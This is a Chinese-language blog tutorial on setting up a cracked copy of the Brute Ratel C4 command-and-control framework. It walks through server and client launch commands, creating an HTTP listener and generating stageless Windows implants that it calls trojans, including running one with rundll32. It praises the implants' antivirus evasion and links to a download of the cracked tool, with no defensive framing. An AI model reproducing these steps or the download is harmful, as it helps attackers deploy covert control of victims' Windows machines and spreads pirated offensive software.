在前面的文章中，我们提到过很多C2框架工具。如CS viper等。今天为大家分享另外一款好玩的工具Brute Ratel C4

部署

下载完成后，在kali中解压文件。

安装环境和证书（可省略）

进入adhoc_scripts目录下运行，安装环境和生成证书

chmod +x install.sh
chmod +x genssl.sh
./install.sh
./genssl.sh

接下来，分别给brute-ratel-linx64_crack以及lib64/commander执行权限

chmod +x brute-ratel-linx64_crack
chmod +x lib64/commander

接下来，启动服务端

./brute-ratel-linx64_crack -ratel -a admin -p password -h 127.0.0.1:50000 -sc cert.pem -sk key.pem

执行完后将生成的key.pem 和cert.pem复制到工具的目录下

参数说明：

• -a 用户名
• -p 登录密码

接下来，我们启动客户端

chmod +x Rungui.sh #给客户端添加权限
./Rungui.sh

修改你的端口和账号密码等信息。完成后点击头像登录。

添加监听

和cs等工具一样，接下来我们新建一个监听。点击C4 Profiler -> Add http Listener

参数配置示例如下：

注意： sleep和jitter类似于cs的延时时间，可调低，末尾最后一行勾选后，马子如果一次不上线，不会一直请求

生成shell

点击save保存，即可得到一个监听器，右键此监听器，选择Stageless，即可生成对应架构的马子

但不知为何，作者生成exe文件后，在Windows11系统上得不到Shell。无奈生成了dll文件。

rundll32 kali.dll,main 

当前，免杀效果还是挺好的。

相关操作

当然，还有很多好玩的功能。我们会在后期的文章中为大家更新！

总结

优点： 免杀非常友好，和cs等工具相似，入手门槛低。

不足： 目前仅支持Windows Payload。希望在后面能增加其他平台的Payload。

获取工具

链接：https://pan.quark.cn/s/24fe53b0aaf4